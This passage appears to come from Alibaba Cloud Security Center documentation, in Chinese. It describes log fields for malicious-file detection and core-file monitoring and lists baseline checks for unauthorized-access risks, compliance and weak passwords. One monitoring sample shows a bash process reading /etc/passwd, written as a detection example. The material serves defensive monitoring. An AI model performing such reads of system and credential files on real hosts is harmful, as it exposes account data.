intranet_ip | 主机私网IP地址。 | 172.16.XX.XX |
sas_group_name | 云安全中心服务器分组名称。 | 分组1 |
instance_id | 主机实例ID。 | i-wz995eivg28f1m** |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
恶意文件检测日志
字段名 | 说明 | 示例 |
bucket_name | Bucket名称。 | ***-test |
event_id | 告警ID。 | 802210 |
event_name | 告警名称。 | 挖矿程序 |
md5 | 文件的MD5值。 | 6bc2bc******53d409b1 |
sha256 | 文件的SHA256值。 | f038f9525******7772981e87f85 |
result | 检测结果。取值:
| 0 |
file_path | 文件路径。 | test.zip/bin_test |
etag | OSS文件标识。 | 6BC2B******853D409B1 |
risk_level | 风险等级。取值:
| remind |
source | 检测场景。
| OSS |
parent_md5 | 父类文件或压缩包文件的MD5值。 | 3d0f8045bb9****** |
parent_sha256 | 父类文件或压缩包文件的SHA256值。 | 69b643d6******a3fb859fa |
parent_file_path | 父类文件或压缩包文件的名称。 | test.zip |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
核心文件监控事件日志
字段名 | 说明 | 示例 |
start_time | 事件的最新发生时间。单位为秒。 | 1718678414 |
uuid | 客户端的UUID。 | 5d83b26b-b**a-4**a-9267-12**** |
file_path | 文件路径。 | /etc/passwd |
proc_path | 进程路径。 | /usr/bin/bash |
rule_id | 命中规则ID。 | 123 |
rule_name | 规则名称。 | file_test_rule |
cmdline | 命令行。 | bash /opt/a |
operation | 对文件的操作。 | READ |
risk_level | 告警等级。 | 2 |
pid | 进程ID。 | 45324 |
proc_permission | 进程权限。 | rwxrwxrwx |
instance_id | 实例ID。 | i-wz995eivg2**** |
internet_ip | 互联网IP。 | 192.0.2.1 |
intranet_ip | 私网IP。 | 172.16.0.1 |
instance_name | 实例名称。 | aegis-test |
platform | 操作系统类型。 | Linux |
附录
基线类型及子类型列表
类型名称 | 子类型名称 | 描述 |
hc_exploit | hc_exploit_redis | 高危风险利用-Redis未授权访问高危风险 |
hc_exploit_activemq | 高危风险利用-ActiveMQ未授权访问高危风险 | |
hc_exploit_couchdb | 高危风险利用-CouchDB未授权访问高危风险 | |
hc_exploit_docker | 高危风险利用-Docker未授权访问高危风险 | |
hc_exploit_es | 高危风险利用-Elasticsearch未授权访问高危风险 | |
hc_exploit_hadoop | 高危风险利用-Hadoop未授权访问高危风险 | |
hc_exploit_jboss | 高危风险利用-Jboss未授权访问高危风险 | |
hc_exploit_jenkins | 高危风险利用-Jenkins未授权访问高危风险 | |
hc_exploit_k8s_api | 高危风险利用Kubernetes-Apiserver未授权访问高危风险 | |
hc_exploit_ldap | 高危风险利用-LDAP未授权访问高危风险(Windows环境) | |
hc_exploit_ldap_linux | 高危风险利用-openLDAP未授权访问高危风险(Linux环境) | |
hc_exploit_memcache | 高危风险利用-Memcached未授权访问高危风险 | |
hc_exploit_mongo | 高危风险利用-Mongodb未授权访问高危风险 | |
hc_exploit_pgsql | 高危风险利用-Postgresql未授权访问高危风险基线 | |
hc_exploit_rabbitmq | 高危风险利用-RabbitMQ未授权访问高危风险 | |
hc_exploit_rsync | 高危风险利用-rsync未授权访问高危风险 | |
hc_exploit_tomcat | 高危风险利用-Apache Tomcat AJP文件包含漏洞风险 | |
hc_exploit_zookeeper | 高危风险利用-ZooKeeper未授权访问高危风险 | |
hc_container | hc_docker | 阿里云标准-Docker安全基线检查 |
hc_middleware_ack_master | 国际通用安全最佳实践-Kubernetes(ACK) Master节点安全基线检查 | |
hc_middleware_ack_node | 国际通用安全最佳实践-Kubernetes(ACK) Node节点安全基线检查 | |
hc_middleware_k8s | 阿里云标准-Kubernetes-Master安全基线检查 | |
hc_middleware_k8s_node | 阿里云标准-Kubernetes-Node安全基线检查 | |
cis | hc_suse 15_djbh | 等保三级-SUSE 15合规基线检查 |
hc_aliyun_linux3_djbh_l3 | 等保三级-Alibaba Cloud Linux 3合规基线检查 | |
hc_aliyun_linux_djbh_l3 | 等保三级-Alibaba Cloud Linux/Aliyun Linux 2合规基线检查 | |
hc_bind_djbh | 等保三级-Bind合规基线检查 | |
hc_centos 6_djbh_l3 | 等保三级-CentOS Linux 6合规基线检查 | |
hc_centos 7_djbh_l3 | 等保三级-CentOS Linux 7合规基线检查 | |
hc_centos 8_djbh_l3 | 等保三级-CentOS Linux 8合规基线检查 | |
hc_debian_djbh_l3 | 等保三级-Debian Linux 8/9/10合规基线检查 | |
hc_iis_djbh | 等保三级-IIS合规基线检查 | |
hc_informix_djbh | 等保三级-Informix合规基线检查 | |
hc_jboss_djbh | 等保三级-Jboss合规基线检查 | |
hc_mongo_djbh | 等保三级-MongoDB合规基线检查 | |
hc_mssql_djbh | 等保三级-SQL Server合规基线检查 | |
hc_mysql_djbh | 等保三级-MySql合规基线检查 | |
hc_nginx_djbh | 等保三级-Nginx合规基线检查 | |
hc_oracle_djbh | 等保三级-Oracle合规基线检查 | |
hc_pgsql_djbh | 等保三级-PostgreSql合规基线检查 | |
hc_redhat 6_djbh_l3 | 等保三级-Redhat Linux 6合规基线检查 | |
hc_redhat_djbh_l3 | 等保三级-Redhat Linux 7合规基线检查 | |
hc_redis_djbh | 等保三级-Redis合规基线检查 | |
hc_suse 10_djbh_l3 | 等保三级-SUSE 10合规基线检查 | |
hc_suse 12_djbh_l3 | 等保三级-SUSE 12合规基线检查 | |
hc_suse_djbh_l3 | 等保三级-SUSE 11合规基线检查 | |
hc_ubuntu 14_djbh_l3 | 等保三级-Ubuntu 14合规基线检查 | |
hc_ubuntu_djbh_l3 | 等保三级-Ubuntu 16/18/20合规基线检查 | |
hc_was_djbh | 等保三级-Websphere Application Server合规基线检查 | |
hc_weblogic_djbh | 等保三级-Weblogic合规基线检查 | |
hc_win 2008_djbh_l3 | 等保三级-Windows 2008 R2合规基线检查 | |
hc_win 2012_djbh_l3 | 等保三级-Windows 2012 R2合规基线检查 | |
hc_win 2016_djbh_l3 | 等保三级-Windows 2016/2019 合规基线检查 | |
hc_aliyun_linux_djbh_l2 | 等保二级-Alibaba Cloud Linux/Aliyun Linux 2合规基线检查 | |
hc_centos 6_djbh_l2 | 等保二级-CentOS Linux 6合规基线检查 | |
hc_centos 7_djbh_l2 | 等保二级-CentOS Linux 7合规基线检查 | |
hc_debian_djbh_l2 | 等保二级-Debian Linux 8合规基线检查 | |
hc_redhat 7_djbh_l2 | 等保二级-Redhat Linux 7合规基线检查 | |
hc_ubuntu_djbh_l2 | 等保二级-Ubuntu16/18合规基线检查 | |
hc_win 2008_djbh_l2 | 等保二级-Windows 2008 R2合规基线检查 | |
hc_win 2012_djbh_l2 | 等保二级-Windows 2012 R2合规基线检查 | |
hc_win 2016_djbh_l2 | 等保二级-Windows 2016/2019 合规基线检查 | |
hc_aliyun_linux_cis | 国际通用安全最佳实践-Alibaba Cloud Linux/Aliyun Linux 2安全基线检查 | |
hc_centos 6_cis_rules | 国际通用安全最佳实践-CentOS Linux 6安全基线检查 | |
hc_centos 7_cis_rules | 国际通用安全最佳实践-CentOS Linux 7安全基线检查 | |
hc_centos 8_cis_rules | 国际通用安全最佳实践-CentOS Linux 8安全基线检查 | |
hc_debian 8_cis_rules | 国际通用安全最佳实践-Debian Linux 8安全基线检查 | |
hc_ubuntu 14_cis_rules | 国际通用安全最佳实践-Ubuntu 14安全基线检查 | |
hc_ubuntu 16_cis_rules | 国际通用安全最佳实践-Ubuntu 16/18/20安全基线检查 | |
hc_win 2008_cis_rules | 国际通用安全最佳实践-Windows Server 2008 R2安全基线检查 | |
hc_win 2012_cis_rules | 国际通用安全最佳实践-Windows Server 2012 R2安全基线检查 | |
hc_win 2016_cis_rules | 国际通用安全最佳实践-Windows Server 2016/2019 R2安全基线检查 | |
hc_kylin_djbh_l3 | 等保三级-麒麟合规基线检查 | |
hc_uos_djbh_l3 | 等保三级-Uos合规基线检查 | |
hc_best_security | hc_aliyun_linux | 阿里云标准-Alibaba Cloud Linux/Aliyun Linux 2安全基线检查 |
hc_centos 6 | 阿里云标准-CentOS Linux 6安全基线检查 | |
hc_centos 7 | 阿里云标准-CentOS Linux 7/8安全基线检查 | |
hc_debian | 阿里云标准-Debian Linux 8/9/10安全基线检查 | |
hc_redhat 6 | 阿里云标准-Redhat Linux 6安全基线检查 | |
hc_redhat 7 | 阿里云标准-Redhat Linux 7/8安全基线检查 | |
hc_ubuntu | 阿里云标准-Ubuntu安全基线检查 | |
hc_windows_2008 | 阿里云标准-Windows 2008 R2安全基线检查 | |
hc_windows_2012 | 阿里云标准-Windows 2012 R2安全基线检查 | |
hc_windows_2016 | 阿里云标准-Windows 2016/2019 安全基线检查 | |
hc_db_mssql | 阿里云标准-SQL server安全基线检查 | |
hc_memcached_ali | 阿里云标准-Memcached安全基线检查 | |
hc_mongodb | 阿里云标准-MongoDB 3.x版本安全基线检查 | |
hc_mysql_ali | 阿里云标准-Mysql安全基线检查 | |
hc_oracle | 阿里云标准-Oracle 11g安全基线检查 | |
hc_pgsql_ali | 阿里云标准-PostgreSql安全基线检查 | |
hc_redis_ali | 阿里云标准-Redis安全基线检查 | |
hc_apache | 阿里云标准-Apache安全基线检查 | |
hc_iis_8 | 阿里云标准-IIS 8安全基线检查 | |
hc_nginx_linux | 阿里云标准-Nginx安全基线检查 | |
hc_suse 15 | 阿里云标准-SUSE Linux 15安全基线检查 | |
tomcat 7 | 阿里云标准-Apache Tomcat 安全基线检查 | |
weak_password | hc_mongodb_pwd | 弱口令-MongoDB登录弱口令检测(支持2.x版本) |
hc_weakpwd_ftp_linux | 弱口令-FTP登录弱口令检查 | |
hc_weakpwd_linux_sys | 弱口令-Linux系统登录弱口令检查 | |
hc_weakpwd_mongodb 3 | 弱口令-MongoDB登录弱口令检测 | |
hc_weakpwd_mssql | 弱口令-SQL Server数据库登录弱口令检查 | |
hc_weakpwd_mysql_linux | 弱口令-Mysql数据库登录弱口令检查 | |
hc_weakpwd_mysql_win | 弱口令-Mysql数据库登录弱口令检查(Windows版) | |
hc_weakpwd_openldap | 弱口令-Openldap登录弱口令检查 | |
hc_weakpwd_oracle | 弱口令-Oracle登录弱口令检测 | |
hc_weakpwd_pgsql | 弱口令-PostgreSQL数据库登录弱口令检查 | |
hc_weakpwd_pptp | 弱口令-pptpd服务登录弱口令检查 | |
hc_weakpwd_redis_linux | 弱口令-Redis数据库登录弱口令检查 | |
hc_weakpwd_rsync | 弱口令-rsync服务登录弱口令检查 | |
hc_weakpwd_svn | 弱口令-svn服务登录弱口令检查 | |
hc_weakpwd_tomcat_linux | 弱口令-Apache Tomcat控制台弱口令检查 | |
hc_weakpwd_vnc | 弱口令-VncServer弱口令检查 | |
hc_weakpwd_weblogic | 弱口令-Weblogic 12c登录弱口令检测 | |
hc_weakpwd_win_sys | 弱口令-Windows系统登录弱口令检查 |